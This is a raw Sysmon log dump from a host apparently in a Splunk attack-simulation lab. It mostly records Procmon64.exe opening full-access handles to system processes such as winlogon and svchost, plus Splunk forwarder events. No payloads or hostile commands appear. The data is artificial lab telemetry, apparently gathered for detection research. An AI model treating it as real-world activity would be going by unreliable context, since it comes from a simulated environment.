10341000x8000000000000000288829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.808{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.787{C8EA50B7-11D1-6216-2305-000000003802}62806284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.709{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-BA00-000000003802}4464C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.486{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AD-6215-BA00-000000003802}4464C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.405{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11D1-6216-2305-000000003802}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-11D1-6216-2305-000000003802}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11D1-6216-2305-000000003802}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.393{C8EA50B7-11D1-6216-2305-000000003802}6280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000288817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.387{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6FDCB8ED1C8EC08FD98461CE8425DA5,SHA256=688151043492750FD6B892DED7AF1328D9377C6F1C98C4079C04E2216A543C14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.243{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.181{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.178{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B400-000000003802}2388C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.108{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B400-000000003802}2388C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.103{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B200-000000003802}2320C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.051{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F2AA-6215-B200-000000003802}2320C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:01.045{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F1AB-6215-8500-000000003802}2868C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:02.549{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422779EBE755CF64EB3F9ACF44FEBD8C,SHA256=698AE88C2C5237E5AA58B60D1E44D3F3C7558A8F8496B52F13A9CA489C47417E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.973{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.956{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.694{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.690{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-FBF6-6215-0602-000000003802}5704C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.676{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-FBF6-6215-0602-000000003802}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.670{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:02.637{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F674-6215-5D01-000000003802}5016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 